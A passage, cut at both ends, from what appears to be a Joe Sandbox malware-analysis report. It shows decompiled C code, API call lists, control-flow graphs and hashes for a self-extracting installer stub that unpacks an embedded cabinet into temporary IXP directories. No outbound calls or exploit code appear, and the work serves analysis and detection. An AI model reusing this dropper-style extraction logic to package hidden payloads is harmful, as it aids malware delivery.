									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x199124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0019268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x199a38; // 0x0
							_t110 =  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1989e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x199a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E001944B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x199124 = E00196285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E001944B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x199124 = E00196285();
					_t66 = 0;
					L33:
					return E00196CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                    0x0019597d
                                                                                                                                                                                                                                    0x00195988
                                                                                                                                                                                                                                    0x0019598f
                                                                                                                                                                                                                                    0x0019599a
                                                                                                                                                                                                                                    0x001959a6
                                                                                                                                                                                                                                    0x001959a8
                                                                                                                                                                                                                                    0x001959af
                                                                                                                                                                                                                                    0x001959b9
                                                                                                                                                                                                                                    0x001959dd
                                                                                                                                                                                                                                    0x001959e4
                                                                                                                                                                                                                                    0x001959f1
                                                                                                                                                                                                                                    0x001959fe
                                                                                                                                                                                                                                    0x00195a0b
                                                                                                                                                                                                                                    0x00195a13
                                                                                                                                                                                                                                    0x00195a19
                                                                                                                                                                                                                                    0x00195a1b
                                                                                                                                                                                                                                    0x00195ba1
                                                                                                                                                                                                                                    0x00195baf
                                                                                                                                                                                                                                    0x00195bbd
                                                                                                                                                                                                                                    0x00195bd8
                                                                                                                                                                                                                                    0x00195bde
                                                                                                                                                                                                                                    0x00195be3
                                                                                                                                                                                                                                    0x00195bec
                                                                                                                                                                                                                                    0x00195bf0
                                                                                                                                                                                                                                    0x00195bfc
                                                                                                                                                                                                                                    0x00195c02
                                                                                                                                                                                                                                    0x00195c02
                                                                                                                                                                                                                                    0x00195c02
                                                                                                                                                                                                                                    0x00195c04
                                                                                                                                                                                                                                    0x00195c04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195c04
                                                                                                                                                                                                                                    0x00195a27
                                                                                                                                                                                                                                    0x00195a3a
                                                                                                                                                                                                                                    0x00195a46
                                                                                                                                                                                                                                    0x00195a48
                                                                                                                                                                                                                                    0x00195a4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195a64
                                                                                                                                                                                                                                    0x00195a6a
                                                                                                                                                                                                                                    0x00195a6c
                                                                                                                                                                                                                                    0x00195abc
                                                                                                                                                                                                                                    0x00195ac2
                                                                                                                                                                                                                                    0x00195ac9
                                                                                                                                                                                                                                    0x00195aca
                                                                                                                                                                                                                                    0x00195aca
                                                                                                                                                                                                                                    0x00195acc
                                                                                                                                                                                                                                    0x00195acc
                                                                                                                                                                                                                                    0x00195acf
                                                                                                                                                                                                                                    0x00195ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ad3
                                                                                                                                                                                                                                    0x00195ad6
                                                                                                                                                                                                                                    0x00195ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ada
                                                                                                                                                                                                                                    0x00195adc
                                                                                                                                                                                                                                    0x00195add
                                                                                                                                                                                                                                    0x00195add
                                                                                                                                                                                                                                    0x00195ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ae0
                                                                                                                                                                                                                                    0x00195ae2
                                                                                                                                                                                                                                    0x00195ae4
                                                                                                                                                                                                                                    0x00195ae6
                                                                                                                                                                                                                                    0x00195ae6
                                                                                                                                                                                                                                    0x00195ae6
                                                                                                                                                                                                                                    0x00195ae9
                                                                                                                                                                                                                                    0x00195aeb
                                                                                                                                                                                                                                    0x00195af0
                                                                                                                                                                                                                                    0x00195af6
                                                                                                                                                                                                                                    0x00195af8
                                                                                                                                                                                                                                    0x00195af9
                                                                                                                                                                                                                                    0x00195af9
                                                                                                                                                                                                                                    0x00195afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195afd
                                                                                                                                                                                                                                    0x00195aff
                                                                                                                                                                                                                                    0x00195b00
                                                                                                                                                                                                                                    0x00195b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b03
                                                                                                                                                                                                                                    0x00195b05
                                                                                                                                                                                                                                    0x00195b08
                                                                                                                                                                                                                                    0x00195b20
                                                                                                                                                                                                                                    0x00195b27
                                                                                                                                                                                                                                    0x00195b52
                                                                                                                                                                                                                                    0x00195b52
                                                                                                                                                                                                                                    0x00195b5b
                                                                                                                                                                                                                                    0x00195b62
                                                                                                                                                                                                                                    0x00195b6b
                                                                                                                                                                                                                                    0x00195b6d
                                                                                                                                                                                                                                    0x00195b76
                                                                                                                                                                                                                                    0x00195b7d
                                                                                                                                                                                                                                    0x00195b83
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b7f
                                                                                                                                                                                                                                    0x00195b6f
                                                                                                                                                                                                                                    0x00195b72
                                                                                                                                                                                                                                    0x00195b72
                                                                                                                                                                                                                                    0x00195b85
                                                                                                                                                                                                                                    0x00195b98
                                                                                                                                                                                                                                    0x00195b9e
                                                                                                                                                                                                                                    0x00195b87
                                                                                                                                                                                                                                    0x00195b8f
                                                                                                                                                                                                                                    0x00195b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b85
                                                                                                                                                                                                                                    0x00195b29
                                                                                                                                                                                                                                    0x00195b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b35
                                                                                                                                                                                                                                    0x00195b48
                                                                                                                                                                                                                                    0x00195b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b4a
                                                                                                                                                                                                                                    0x00195b0f
                                                                                                                                                                                                                                    0x00195b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195b16
                                                                                                                                                                                                                                    0x00195a7c
                                                                                                                                                                                                                                    0x00195a8a
                                                                                                                                                                                                                                    0x00195aa5
                                                                                                                                                                                                                                    0x00195aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001959bb
                                                                                                                                                                                                                                    0x001959c0
                                                                                                                                                                                                                                    0x001959c7
                                                                                                                                                                                                                                    0x001959d1
                                                                                                                                                                                                                                    0x001959d6
                                                                                                                                                                                                                                    0x00195c05
                                                                                                                                                                                                                                    0x00195c14
                                                                                                                                                                                                                                    0x00195c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001959A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 001959AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00195A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00195A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00195A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00195A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00195A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00195AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00195BFC
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                                                    • Opcode ID: ed047529de121a1fa40647fc63aa5c9d80d3a9c424be046ebd36ce8b8e9e40bf
                                                                                                                                                                                                                                    • Instruction ID: 83e85fc950eafc819c10eba28444977973e6a519e8b4a7df1c7a3d48831a25ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed047529de121a1fa40647fc63aa5c9d80d3a9c424be046ebd36ce8b8e9e40bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 227182B1900208AFEF169F64CC85FFA77BEEB48344F5441AAF506E7540DB309E858B65
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 374 194fe0-19501a call 19468f FindResourceA LoadResource LockResource 377 195161-195163 374->377 378 195020-195027 374->378 379 195029-195051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 195057-19505e call 194efd 378->380 379->380 383 19507c-1950b4 380->383 384 195060-195077 call 1944b9 380->384 389 1950e8-195104 call 1944b9 383->389 390 1950b6-1950da 383->390 388 195107-19510e 384->388 392 19511d-19511f 388->392 393 195110-195117 FreeResource 388->393 398 195106 389->398 390->398 402 1950dc 390->402 395 19513a-195141 392->395 396 195121-195127 392->396 393->392 400 19515f 395->400 401 195143-19514a 395->401 396->395 399 195129-195135 call 1944b9 396->399 398->388 399->395 400->377 401->400 404 19514c-195159 SendMessageA 401->404 405 1950e3-1950e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00194FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x199144 = E0019468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x199140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x198584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x198584, 0x841), 5); // executed
				}
				_t10 = E00194EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00194CA0, E00194CC0, E00194980, E00194A50, E00194AD0, E00194B60, E00194BC0, 1, 0x199148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x199148; // 0x0
						_t24 =  *0x198584; // 0x0
						E001944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x191140, 0, E00194CD0, 0, 0x199140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x198584; // 0x0
					E001944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x199140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x199140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x1991d8; // 0x0
						if(_t47 == 0) {
							E001944B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x198a38 & 0x00000001) == 0 && ( *0x199a34 & 0x00000001) == 0) {
						SendMessageA( *0x198584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                    0x00194fe0
                                                                                                                                                                                                                                    0x00194fe6
                                                                                                                                                                                                                                    0x00194ff9
                                                                                                                                                                                                                                    0x0019500d
                                                                                                                                                                                                                                    0x00195013
                                                                                                                                                                                                                                    0x0019501a
                                                                                                                                                                                                                                    0x00195163
                                                                                                                                                                                                                                    0x00195163
                                                                                                                                                                                                                                    0x00195020
                                                                                                                                                                                                                                    0x00195027
                                                                                                                                                                                                                                    0x00195037
                                                                                                                                                                                                                                    0x00195051
                                                                                                                                                                                                                                    0x00195051
                                                                                                                                                                                                                                    0x00195057
                                                                                                                                                                                                                                    0x0019505e
                                                                                                                                                                                                                                    0x001950a7
                                                                                                                                                                                                                                    0x001950ad
                                                                                                                                                                                                                                    0x001950b4
                                                                                                                                                                                                                                    0x001950e8
                                                                                                                                                                                                                                    0x001950e8
                                                                                                                                                                                                                                    0x001950ee
                                                                                                                                                                                                                                    0x001950ff
                                                                                                                                                                                                                                    0x00195104
                                                                                                                                                                                                                                    0x00195106
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195106
                                                                                                                                                                                                                                    0x001950cd
                                                                                                                                                                                                                                    0x001950d3
                                                                                                                                                                                                                                    0x001950da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001950dd
                                                                                                                                                                                                                                    0x001950e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195060
                                                                                                                                                                                                                                    0x00195060
                                                                                                                                                                                                                                    0x00195070
                                                                                                                                                                                                                                    0x00195075
                                                                                                                                                                                                                                    0x00195107
                                                                                                                                                                                                                                    0x00195107
                                                                                                                                                                                                                                    0x0019510e
                                                                                                                                                                                                                                    0x00195111
                                                                                                                                                                                                                                    0x00195117
                                                                                                                                                                                                                                    0x00195117
                                                                                                                                                                                                                                    0x0019511f
                                                                                                                                                                                                                                    0x00195121
                                                                                                                                                                                                                                    0x00195127
                                                                                                                                                                                                                                    0x00195135
                                                                                                                                                                                                                                    0x00195135
                                                                                                                                                                                                                                    0x00195127
                                                                                                                                                                                                                                    0x00195141
                                                                                                                                                                                                                                    0x00195159
                                                                                                                                                                                                                                    0x00195159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019515f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00194FFE
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00195006
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0019500D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00195030
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00195037
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0019504A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00195051
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00195111
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00195159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: 2f59a15a2d73347a1e25eb0715c38494c4ba05655aaf3244515191661619fc8a
                                                                                                                                                                                                                                    • Instruction ID: 3551e60668b302b0a6605ba041fdcdf57b0c5c4de91f82b767772848c734768d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f59a15a2d73347a1e25eb0715c38494c4ba05655aaf3244515191661619fc8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031D6B07407027FEF215B65AD8AF67379DBB04B59F04003BF902A29A1DBB58C8587A5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001953A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E001953A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x198004; // 0x21bd9a3c
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0019171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00191680(_t32, 0x104, _t20);
					E0019658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00196CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x198a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                    0x001953ac
                                                                                                                                                                                                                                    0x001953b3
                                                                                                                                                                                                                                    0x001953b9
                                                                                                                                                                                                                                    0x001953bb
                                                                                                                                                                                                                                    0x001953bd
                                                                                                                                                                                                                                    0x001953bf
                                                                                                                                                                                                                                    0x001953d1
                                                                                                                                                                                                                                    0x001953d6
                                                                                                                                                                                                                                    0x001953e0
                                                                                                                                                                                                                                    0x001953e2
                                                                                                                                                                                                                                    0x001953f5
                                                                                                                                                                                                                                    0x001953fb
                                                                                                                                                                                                                                    0x00195402
                                                                                                                                                                                                                                    0x0019540b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195415
                                                                                                                                                                                                                                    0x00195416
                                                                                                                                                                                                                                    0x00195427
                                                                                                                                                                                                                                    0x0019542a
                                                                                                                                                                                                                                    0x0019542b
                                                                                                                                                                                                                                    0x00195434
                                                                                                                                                                                                                                    0x00195434
                                                                                                                                                                                                                                    0x0019543a
                                                                                                                                                                                                                                    0x0019544c
                                                                                                                                                                                                                                    0x0019544c
                                                                                                                                                                                                                                    0x00195452
                                                                                                                                                                                                                                    0x0019545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019545e
                                                                                                                                                                                                                                    0x0019545f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001953FB
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195402
                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019541F
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019542B
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195434
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195452
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                    • API String ID: 1082909758-3746127100
                                                                                                                                                                                                                                    • Opcode ID: 70441e74ffa81d7068002648c454d56ce7d7a4875c07a4b60d355bf831335bad
                                                                                                                                                                                                                                    • Instruction ID: 92e93fa1db04766bc25783c2da3bbcdc436e5e39aac20e295ee9f373a6f34336
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70441e74ffa81d7068002648c454d56ce7d7a4875c07a4b60d355bf831335bad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911017170050477DB21AF269C49FAF3A6EEFD2721F440126B646E3590DF748AC687A2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00195467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 478 195467-195484 479 19548a-195490 call 1953a1 478->479 480 19551c-195528 call 191680 478->480 484 195495-195497 479->484 483 19552d-195539 call 1958c8 480->483 493 19553b-195545 CreateDirectoryA 483->493 494 19554d-195552 483->494 486 19549d-1954c0 call 191781 484->486 487 195581-195583 484->487 495 19550c-19551a call 19658a 486->495 496 1954c2-1954d8 GetSystemInfo 486->496 489 19558d-19559d call 196ce0 487->489 498 195577-19557c call 196285 493->498 499 195547 493->499 500 195585-19558b 494->500 501 195554-195557 call 19597d 494->501 495->483 502 1954da-1954dd 496->502 503 1954fe 496->503 498->487 499->494 500->489 509 19555c-19555e 501->509 507 1954df-1954e2 502->507 508 1954f7-1954fc 502->508 510 195503-195507 call 19658a 503->510 513 1954f0-1954f5 507->513 514 1954e4-1954e7 507->514 508->510 509->500 515 195560-195566 509->515 510->495 513->510 514->495 517 1954e9-1954ee 514->517 515->487 518 195568-195575 RemoveDirectoryA 515->518 517->510 518->487
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E00195467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x198004; // 0x21bd9a3c
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x1991e4;
					_t42 = 0x104;
					E00191680(0x1991e4, 0x104);
					L14:
					_t13 = E001958C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x199124 = 0;
							_t14 = 1;
							L24:
							return E00196CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0019597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x198a20; // 0x0
						if(_t61 != 0) {
							 *0x198a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x199124 = E00196285();
						goto L22;
					}
					 *0x198a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E001953A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x1991e4;
				E00191781(0x1991e4, 0x104, __ecx,  &_v268);
				if(( *0x199a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0019658A(_t48, 0x104, 0x191140);
					goto L14;
				}
				GetSystemInfo( &_v304);
